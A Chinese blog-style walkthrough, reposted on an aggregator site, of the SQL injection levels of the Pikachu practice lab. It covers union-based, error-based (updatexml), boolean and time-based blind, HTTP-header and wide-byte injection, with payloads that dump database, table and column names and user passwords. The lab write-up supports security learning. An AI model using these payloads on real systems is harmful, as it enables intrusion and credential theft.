IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> pikachu-SQL注入 -> 正文阅读

[大数据]pikachu-SQL注入

pikachu-SQL注入

1.数字型(post)

? 使用burp抓包,并进行联合注入

判断字段数
在这里插入图片描述
在这里插入图片描述
爆出数据库名
在这里插入图片描述
爆出表名
在这里插入图片描述
爆出字段名
在这里插入图片描述
爆出用户名和密码
在这里插入图片描述

2.字符型注入(get)

在这里插入图片描述
? 同样使用联合注入但是需要闭合单引号

# 搜索框内输入
1' order by 3 #
1' order by 2 #
-1' union select 1,group_concat(schema_name) from information_schema.schemata #
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' #
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
-1' union select username,password from piakchu.users #

3.搜索型注入

在这里插入图片描述
搜索型注入主要利用了mysql注入的模糊搜索%

select username,id,email from member where username like '%$name%';

构造后
select username,id,email from member where username like '%k%' and 1=1 #';

4.xx型注入

和字符型注入一样,知识闭合的方式不同
在这里插入图片描述

-1')  union select 1,group_concat(schema_name) from information_schema.schemata #xxxxxxxxxx 1') -1')  union select 1,group_concat(schema_name) from information_schema.schemata #

5."insert/update"注入

在这里插入图片描述
在这里插入图片描述

# 报错注入
xxx' or updatexml(1,concat(0x7e,database()),0) or '

6 delete 注入

在这里插入图片描述
在这里插入图片描述

+or+updatexml(1,comcat(0x7e,database()),0)

7."http header"注入

在这里插入图片描述
这里我利用了ModHeader插件来修改http head 头

在这里插入图片描述

# 报错注入修改User-Agent
xx' or updatexml(1,concat(0x7e,database()),1) or '

xx' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')),1) or ' 

xx' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or ' 

xx' or updatexml(1,concat(0x7e,(select group_concat(username) from pikachu.users)),1) or '

8.盲注(base on boolian)

在这里插入图片描述

# 布尔注入
kobe' and ascii(substr(database(),1,1))=112#

9.盲注(base on time)

# 根据时间长短判断是否正确
kobe' and if(ascii(substr((select database()),1,1)) > 10,sleep(5),1) #

在这里插入图片描述

10.宽字节注入

在这里插入图片描述
使用%df 和\宽字节形成’運’

select uid,email from member where username ='1運' or 1=1#'

在这里插入图片描述
  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2022-03-12 17:36:19  更:2022-03-12 17:40:49 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2025年2日历 -2025/2/23 1:01:57-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码